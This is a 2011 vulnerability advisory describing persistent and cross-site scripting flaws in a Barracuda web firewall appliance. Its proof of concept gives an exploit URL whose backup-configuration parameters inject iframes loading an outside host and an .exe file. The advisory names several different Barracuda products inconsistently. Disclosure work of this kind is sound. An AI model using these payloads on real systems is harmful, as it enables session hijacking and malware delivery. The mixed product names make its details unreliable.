Document Title:
===============
Barracuda Web Firewall 660 - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=29


Release Date:
=============
2011-12-16


Vulnerability Laboratory ID (VL-ID):
====================================
30


Product & Service Introduction:
===============================
The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. 
The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or 
application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.

    * Protection against common attacks
    * Outbound data theft protection
    * Web site cloaking
    * Granular policies
    * Secure HTTP traffic
    * SSL Offloading
    * SSL Acceleration
    * Load Balancing

The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase 
the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to 
deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface.

    * Single point of protection for inbound and outbound traffic for all Web applications
    * Protects Web sites and Web applications against application layer attacks
    * Delivers best practices security right out of the box
    * Monitors traffic and provides reports about attackers and attack attempts

The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including 
SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such 
attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is 
designed to combat all attack types that have been categorized as significant threats, including:

    * Cross Site Scripting (XSS)
    * SQL injection flaws
    * OS command injections
    * Site reconnaissance
    * Session hijacking
    * Application denial of service	
    * Malicious probes/crawlers		   
    * Cookie/session tampering          
    * Path traversal
    * Information leakage
...

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php)


Abstract Advisory Information:
==============================
Vulnerability-Lab team discovered multiple persistent Input Validation vulnerabilities on Barracudas Web Filter 910 appliance.


Vulnerability Disclosure Timeline:
==================================
2011-04-03:	Vendor Notification
2011-05-09:	Vendor Response/Feedback
2011-10-13:	Vendor Fix/Patch (last check)
2011-12-18:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
Multiple persistent Input Validation vulnerabilities are detected on Barracudas SSL VPN 480. Local low privileged user account can
implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities 
can lead to information disclosure, access to intranet available servers, manipulated persistent content.

Vulnerable Module(s):
						[+] Authorization Module
						[+] TroubleShooting - wGET Module
						[+] Web Site Translations
						[+] FTP Security Service

			
Pictures:
						../baracuda_fw660.png
						../baracuda_fw660_2.png
						../baracuda_fw660_3.png
						../baracuda_fw660_4.png
						../baracuda_fw660_5.png


1.2
Multiple client side cross site scripting vulnerabilities are detected on Barracudas IM-Firewall 620.
Attackers can form malicious client-side requests to hijack customer/admin sessions.
Successful exploitation requires user inter action & can lead to information disclosure, session 
hijacking and access to servers in the intranet.

Pictures:
						../ive1.png
						../ive2.png


Vulnerable Version(s):
						 Barracuda Web Firewall 660 - v7.5.0.020 & older versions


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by local low privileged user accounts or remote attacker with high required user inter action.
For demonstration or reproduce ...

Manually reproduce ...
1. Login
2. Switch to the vulnerable  module of the application
3. Switch to the vulnerable module & include your own script code. Save! 
4. Enjoy the persistent output results


1.2
Vulnerable Module:   Backup - Automated Configuration Backups

File:		index.cgi
Para:		?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username= ... &&backup_password=

References(URL):
http://wsf.xxx.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US


Site-Code Review:
<td valign=top><table summary="Config Module" width=100% cellpadding=0 cellspacing=0 class=config_module_inner><tr id="config_module_row_1" class="config_module_tr"><td valign=top width=15> </td><td valign=middle width=690    ><input type="button" class="new_button" value="Close Window" onClick="window.close(); return false;"><br><iframe width='95%' src='/cgi-bin/index.cgi?backup_port=21&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%20width%3D800%20height%3D800%3E&locale=en_US&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&password=f232d3b35c04af128aa56e5913fd5292&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&user=guest&backup_life=5&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&et=1261218005&primary_tab=ADVANCED&backup_type=ftp&auth_type=Local&secondary_tab=test_backup_server&iframe=stream_backup_test&content_only=1' marginHeight='1' marginWidth='1' height='300' frameborder='1' button_text='Stop' id='frame_results' ></iframe><input type=hidden name=content_only value=1 /></td></tr></table></td>


Solution - Fix & Patch:
=======================
Barracuda implemented after the issues 2011 a validation mask to filter malicious & disallowed inputs.
The barracuda firmware of the filter has been update multiple times.


Security Risk:
==============
1.1
The security risk of the discovered persistent vulnerabilities are estimated as high(-).

1.2
The security risk of the discovered client side cross site scripting  vulnerabilities are estimated as low(+).


Credits & Authors:
==================
Vulnerability Research Laboratory  - Benjamin Kunz Mejri (Rem0ve)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory